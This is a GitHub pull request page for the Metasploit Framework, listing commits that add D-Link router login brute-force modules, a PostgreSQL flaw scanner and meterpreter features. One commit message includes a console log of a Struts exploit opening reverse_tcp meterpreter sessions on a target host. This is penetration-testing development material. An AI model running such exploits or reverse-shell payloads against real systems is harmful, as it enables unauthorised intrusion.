Skip to content

Loading…

Adding a note to HACKING #1

Merged
merged 40 commits into from

5 participants

@todb-r7

Leaves instructions on how to bundle install.

Meatballs1 and others added some commits
@Meatballs1 Meatballs1 Add calling conv to railgun a9bf09a
@Meatballs1 Meatballs1 Change to wldap to allow cdecl a6fea39
@Meatballs1 Meatballs1 msftidy a980419
@Meatballs1 Meatballs1 Fixup wldap32 mistakes 595cace
RageLtMan Add Framework side of stdapi.fs.file.mv
Add the appropriate methods to Rex side of the FS extension and
the commensurate command dispatcher.

Requires rapid7/meterpreter#6 from the
meterpreter repo as well as compiling fresh DLL for
ext_server_stdapi.
d399093
m-1-k-3 dlink dir 300/600 login module - initial commit e574981
m-1-k-3 user fix c4fe218
m-1-k-3 http login module for DLink DIR300revB, DIR600revB, DIR815 e1a719a
m-1-k-3 default to user admin 032214f
m-1-k-3 default to user admin 680b551
m-1-k-3 Dlink DIR615 HW rev B login module 615aa57
m-1-k-3 DIR-645 also working aa981cc
m-1-k-3 feedback included, server header check b6a50da
m-1-k-3 feedback included, server header check 2b4d6eb
m-1-k-3 feedback included, server fingerprinting 1156194
m-1-k-3 report_auth_info - proof 8032a33
jvazquez-r7 cleanup for dlink_dir_300_615_http_login 89de9fd
@m-1-k-3 m-1-k-3 Merge pull request #6 from jvazquez-r7/dlink_dir_300_615_http_login_work
tested and working. pcap follows
1344fa8
m-1-k-3 is_dlink and some more feedback included 64f3e68
m-1-k-3 is_dlink, more feedback included 2f96a67
m-1-k-3 is_dlink, more feedback included, msftidy 78c492d
m-1-k-3 make msftidy happy 7b4cdf4
HD Moore Add scanner module for the new PostgreSQL flaw c8a6dfb
HD Moore Add the advisory URL fe2b598
@todb todb Landing #1702, hdmoore's postgres scanner cb87439
jvazquez-r7 Merge branch 'dlink_login' of https://github.com/m-1-k-3/metasploit-f…
…ramework into m-1-k-3-dlink_login
cff70e4
jvazquez-r7 final cleanup for dlink_dir_300_615_http_login 498a0dc
jvazquez-r7 Merge branch 'dlink_login_dir_300B_600B' of https://github.com/m-1-k-…
…3/metasploit-framework into m-1-k-3-dlink_login_dir_300B_600B
6ec6638
jvazquez-r7 module filename changed 0b9fe53
jvazquez-r7 final cleanup for dlink_dir_session_cgi_http_login 7d1e9af
jvazquez-r7 Merge branch 'dlink_login_dir_615H' of https://github.com/m-1-k-3/met…
…asploit-framework into m-1-k-3-dlink_login_dir_615H
8f60d12
jvazquez-r7 final cleanup for dlink_dir_615h_http_login 30f44c3
James Lee Latest meterpreter bins 2d47be4
James Lee Landing #1463, Meatballs' cdecl fixes ad46b46
James Lee Bins for new stdapi_fs_file_move command ab0535b
James Lee Landing #1579, meterpreter mv
See rapid7/meterpreter/#6
0671406
James Lee Add a test for stdapi_fs_file_move
Also disables tests for sniffer, which is crashy.
7cf6918
James Lee Make msftidy shut up
How did those pesky CRs get in there in the first place?
7fbe477
@todb todb Merges #1706, removing gemcache per brandont
This has been put off for a long while.
bbce538
@todb todb Adding bundler step to HACKING 392ffce
@bturner-r7 bturner-r7 merged commit 392ffce into bturner-r7:remove-gemcache
@bturner-r7 bturner-r7 pushed a commit that referenced this pull request
@Console Console Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```
ab6a2a0
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Feb 8, 2013
  1. @Meatballs1

    Add calling conv to railgun

    Meatballs1 committed
  2. @Meatballs1
  3. @Meatballs1

    msftidy

    Meatballs1 committed
  4. @Meatballs1

    Fixup wldap32 mistakes

    Meatballs1 committed
Commits on Mar 12, 2013
  1. Add Framework side of stdapi.fs.file.mv

    RageLtMan committed
    Add the appropriate methods to Rex side of the FS extension and
    the commensurate command dispatcher.
    
    Requires rapid7/meterpreter#6 from the
    meterpreter repo as well as compiling fresh DLL for
    ext_server_stdapi.
Commits on Mar 25, 2013
  1. dlink dir 300/600 login module - initial commit

    m-1-k-3 committed
Commits on Mar 26, 2013
  1. user fix

    m-1-k-3 committed
Commits on Mar 27, 2013
  1. default to user admin

    m-1-k-3 committed
  2. default to user admin

    m-1-k-3 committed
  3. Dlink DIR615 HW rev B login module

    m-1-k-3 committed
  4. DIR-645 also working

    m-1-k-3 committed
Commits on Mar 29, 2013
  1. feedback included, server header check

    m-1-k-3 committed
  2. feedback included, server header check

    m-1-k-3 committed
  3. feedback included, server fingerprinting

    m-1-k-3 committed
  4. report_auth_info - proof

    m-1-k-3 committed
Commits on Apr 3, 2013
  1. cleanup for dlink_dir_300_615_http_login

    jvazquez-r7 committed
Commits on Apr 4, 2013
  1. @m-1-k-3

    Merge pull request #6 from jvazquez-r7/dlink_dir_300_615_http_login_work

    m-1-k-3 committed
    tested and working. pcap follows
  2. is_dlink and some more feedback included

    m-1-k-3 committed
  3. is_dlink, more feedback included

    m-1-k-3 committed
  4. is_dlink, more feedback included, msftidy

    m-1-k-3 committed
  5. make msftidy happy

    m-1-k-3 committed
  6. Add scanner module for the new PostgreSQL flaw

    HD Moore committed
  7. Add the advisory URL

    HD Moore committed
  8. @todb
  9. Merge branch 'dlink_login' of https://github.com/m-1-k-3/metasploit-f…

    jvazquez-r7 committed
    …ramework into m-1-k-3-dlink_login
  10. final cleanup for dlink_dir_300_615_http_login

    jvazquez-r7 committed
  11. Merge branch 'dlink_login_dir_300B_600B' of https://github.com/m-1-k-…

    jvazquez-r7 committed
    …3/metasploit-framework into m-1-k-3-dlink_login_dir_300B_600B
  12. module filename changed

    jvazquez-r7 committed
  13. final cleanup for dlink_dir_session_cgi_http_login

    jvazquez-r7 committed
  14. Merge branch 'dlink_login_dir_615H' of https://github.com/m-1-k-3/met…

    jvazquez-r7 committed
    …asploit-framework into m-1-k-3-dlink_login_dir_615H
  15. final cleanup for dlink_dir_615h_http_login

    jvazquez-r7 committed
Commits on Apr 5, 2013
  1. Latest meterpreter bins

    James Lee committed
  2. Landing #1463, Meatballs' cdecl fixes

    James Lee committed
  3. Landing #1579, meterpreter mv

    James Lee committed
    See rapid7/meterpreter/#6
  4. Add a test for stdapi_fs_file_move

    James Lee committed
    Also disables tests for sniffer, which is crashy.
  5. Make msftidy shut up

    James Lee committed
    How did those pesky CRs get in there in the first place?
  6. @todb

    Merges #1706, removing gemcache per brandont

    todb committed
    This has been put off for a long while.
  7. @todb

    Adding bundler step to HACKING

    todb committed
Something went wrong with that request. Please try again.